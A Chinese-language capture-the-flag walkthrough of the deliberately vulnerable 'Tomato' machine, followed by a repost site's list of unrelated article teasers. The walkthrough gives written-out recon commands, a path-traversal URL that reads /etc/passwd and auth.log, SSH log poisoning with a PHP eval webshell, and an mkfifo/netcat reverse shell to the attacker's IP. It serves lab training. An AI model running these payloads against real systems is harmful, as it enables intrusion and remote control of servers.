Tomato靶机~文件包含日志

news2024/11/27 8:43:45

在这里插入图片描述
寻找网站上传点并把 php 恶意代码文件改成 jpg 上传到网站上在本地包含引入恶意代码,当文件被引入后代码就被执行;

0x01信息收集

# 环境准备:
Target IP:192.168.66.143
Attack IP:192.168.66.84
靶机目标:Tomato
// 这里需要注意靶机本身环境是桥接模式,我们需要给它换成NAT模式
# 扫描网段
arp-sacn -l

image-20240802162229327

# 对靶机192.168.66.143端口扫描
nmap 192.168.66.143

image-20240802162452483

# 目录扫描
dirsearch -u "http://192.168.66.143"
dirb "http://192.168.66.143"

image-20240802163231021

image-20240802163526548

0x02漏洞发现

image-20240802163658983

发现有文件上传的漏洞

image-20240802164425778

# 由于是linux系统,我们尝试看一下passwd文件
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd

image-20240802164733628

# 我们再看一下它的日志
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

image-20240802165056349

0x03反弹shell

# 我们尝试写一句话木马 ,进行反弹
ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.66.143

image-20240802170251857

# 使用中国蚁剑连接

image-20240802170208101

# 连接终端

image-20240802170752470

# 在kali上开个监听
nc -lvvp 9999 

image-20240802171501796

# 反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f
// IP是攻击机的

image-20240802171608709

好小子,离成功又近一步!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1985459.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

无缝协作的艺术:Codigger 视频会议(Meeting)的用户体验

在当今数字化的时代&#xff0c;远程协作已经成为工作和学习中不可或缺的一部分。然而&#xff0c;远程协作也面临着诸多挑战&#xff0c;如沟通不畅、信息同步不及时、协作工具的复杂性等。而 Codigger 视频会议&#xff08;Meeting&#xff09;作为一款创新的工具&#xff0c…

伦敦银和伦敦金的关系是怎么样的?

在贵金属投资市场中&#xff0c;有两个品种是经常被投资者讨论的&#xff0c;一个是伦敦银&#xff0c;而另外一个是伦敦金&#xff0c;他们的名字很相似&#xff0c;那实际上他们有何关系呢&#xff1f;下面我们就来简单地讨论一下。 伦敦银其实也叫国际现货白银&#xff0c;是…

探索3D视觉中的Transformer架构:通用Backbone与自适应采样策略 !

1 Introduction 计算机视觉中的一个基本问题是在三维空间中理解和识别场景与物体。它允许以紧凑的方式表达关系&#xff0c;并提供在现实世界中导航和操作的能力。3D视觉在各个领域都发挥着重要作用&#xff0c;包括自动驾驶、机器人技术、遥感、医疗、增强现实、设计行业等众…

【Nuxt】初识 Nuxt 和目录说明

初识 Nuxt Nuxt3 支持 Vue3 及其周边生态&#xff0c;提供前后端功能&#xff0c;支持 CSR(SPA)&#xff0c;SSR&#xff0c;SSG 渲染模式的应用。 Nuxt3 特点&#xff1a; Vue技术栈 Nuxt3是基于Vue3Vue RouterVite等技术栈&#xff0c;全程Vue3Vite开发体验(Fast)。 自动导…

6大类果蔬食物百科大全ACCESS数据库

其实今天这个数据库早些时候就已经搞到了&#xff0c;但是鉴于它的多表结构不太喜欢就一直没有整理&#xff0c;然而现在仔细看起来&#xff0c;又觉得这种安排好处还是很好的&#xff0c;清晰明了。发上来看看有没有朋友喜欢&#xff0c;包含了水果类、蔬菜类、坚果类、肉类、…

xss漏洞(二,xss靶场搭建以及简单利用)

本文仅作为学习参考使用&#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 一&#xff0c;环境搭建。 使用工具&#xff1a;PHP study&#xff0c;dvwa靶场。 1&#xff0c;GitHub上下载dvwa到PHP study的WWW文件夹内&#xff0c;并解压。 dvwa下载地址 …

3D Web轻量引擎HOOPS Communicator处理大模型时有哪些优化技巧?

在当今的工程设计和可视化领域&#xff0c;大型3D模型变得越来越普遍。然而&#xff0c;这些模型的复杂性和体量给传统的渲染技术带来了挑战。HOOPS Communicator&#xff0c;作为一个高性能的3D可视化工具&#xff0c;提供了一系列的优化技巧&#xff0c;以提高大型模型的渲染…

ARMxy工业计算机支持BACnet推动智能楼宇能源管控升级

城市化进程的加速&#xff0c;智能楼宇成为了未来建筑的发展趋势。而能源管控作为智能楼宇的重要组成部分&#xff0c;对于实现节能减排、提高能源利用效率具有至关重要的意义。ARMxy 工业计算机作为一种高性能、低功耗的计算平台&#xff0c;为智能楼宇能源管控提供了全新的解…

【砖墙】python刷题记录

R4-哈希表 这题不就是射箭那道题&#xff1f;&#xff01; 很类似好吧 【用最少数量的箭引爆气球】python刷题记录 哈希表前缀和秒杀&#xff01; class Solution:def leastBricks(self, wall: List[List[int]]) -> int:dictdefaultdict(int)nlen(wall)for i in range(n)…

酒店民宿小程序搭建,用户在线一键预订!

近几年&#xff0c;我国旅游业发展非常迅速&#xff0c;同时也带动了酒店民宿的发展。因此&#xff0c;为了提升游客的住宿体验&#xff0c;各大酒店民宿也纷纷开始发展专属的预约小程序&#xff0c;让用户可以在小程序上更加快速便利的查看酒店信息&#xff0c;预订心仪的房间…

中小微企业必看:税贷票贷融资策略与实战技巧

各位中小微企业的老板们&#xff0c;今天咱们来聊聊个实用话题——税贷和票贷&#xff0c;少部分朋友可能还觉得挺新鲜。别看它们听起来有点专业&#xff0c;其实搞懂了&#xff0c;融资就能变得简单又高效。 一、啥是税贷票贷&#xff1f; 税贷票贷&#xff0c;说白了&#x…

服务治理-Nacos

介绍 思考 什么是服务治理 常见的注册中心 Zonnkeeper Eureka Consull Nacos(服务治理 配置中心) Nacos实战入门 修改bin–>startup.smd 把集群模式改为单列模式 问题&#xff1a;如果出现一闪而过&#xff0c;要看jdk环境变量有没有配置&#xff0c;jdk是不是8以上 …

信息采集器pda手持机二维码扫描手持终端

随着物联网技术不断发展&#xff0c;在信息技术日新月异的今天&#xff0c;信息采集器PDA(Personal Digital Assistant)手持机&#xff0c;特别是具备二维码扫描功能的手持终端&#xff0c;已经成为众多行业不可或缺的智能化工具。它们不仅极大地提升了数据收集的效率与准确性&…

飞机机翼弹性、桥梁晃动频率,重要的流固耦合FSI如何用技术解决

背景介绍 最初的流固耦合FSI(Fluid-Solid Interaction)专指研究流体载荷对弹性结构的影响&#xff0c;例如飞机机翼气动弹性问题&#xff0c;船舶螺旋桨的水弹性问题&#xff0c;核反应堆燃料棒的涡激振动问题等等。在数值仿真领域FSI概念扩展到一般性的CFD模型和FEA模型的数据…

OB08/FAGL_FCV--维护汇率/外币重估

OB08&#xff1a;汇率维护 一般使用M类型。 重估汇率维护为PND。&#xff08;每个月底都维护最新的汇率&#xff09; FAGL_FCV&#xff1a;外币余额重估&#xff08;使用刚刚维护的最新的汇率对系统内外汇余额进行重估&#xff09; 关键日期是以哪一天的汇率来进行重估 下面…

C++:模板初阶与STL简介

前言&#xff1a; 上一篇博客我们结束了对C/C内存管理的学习&#xff0c;这篇让我们继续探索模板初阶与了解STL&#xff01; 个人主页&#xff1a;Pianeers 文章专栏&#xff1a;C 如果有问题&#xff0c;欢迎评论区讨论&#xff01; 希望能帮到大家&#xff0c;求点赞&#xf…

数学公式秒变美!2024最新MathType7中文版的魅力功能讲解

MathType 7是一款强大的数学公式编辑器&#xff0c;其中文版本在功能和界面设计上都非常人性化&#xff0c;适合中国用户使用。该软件不仅提供了丰富的数学符号库&#xff0c;还支持手写输入&#xff0c;让用户能够轻松地编辑复杂的数学公式。此外&#xff0c;MathType 7还具有…

Java每日一练:挑战你的编程技能

题目 选自牛客网 1.定义有 StringBuffer s1new StringBuffer(10);s1.append(“1234”)&#xff0c;则s1.length()和s1.capacity()分别是多少? A.4 10 B.4 4 C.10 10 D.10 4 正确答案是A 即s1.length()为4&#xff0c;s1.capacity()为10。 在Java中&#xff0c;StringBuffer…

树莓集团的全球化征程:数字媒体产业的本土与国际布局

在全球数字化转型的浪潮中&#xff0c;树莓集团正稳步推进数字媒体产业从本土到国际的全球化布局。在数字媒体产业这一新兴且充满活力的领域中&#xff0c;树莓集团不仅在国内市场树立了标杆&#xff0c;更以其独特的全球化战略布局&#xff0c;引领着行业的未来趋势。 本土深耕…

【Linux】【系统纪元】Linux起源与环境安装

快乐的流畅&#xff1a;个人主页 个人专栏&#xff1a;《C游记》《进击的C》《Linux迷航》 远方有一堆篝火&#xff0c;在为久候之人燃烧&#xff01; 文章目录 一、Linux的起源1.1 计算机硬件1.2 计算机软件 二、Linux的环境安装2.1 安装方式2.2 安装版本2.3 安装过程2.4 远程…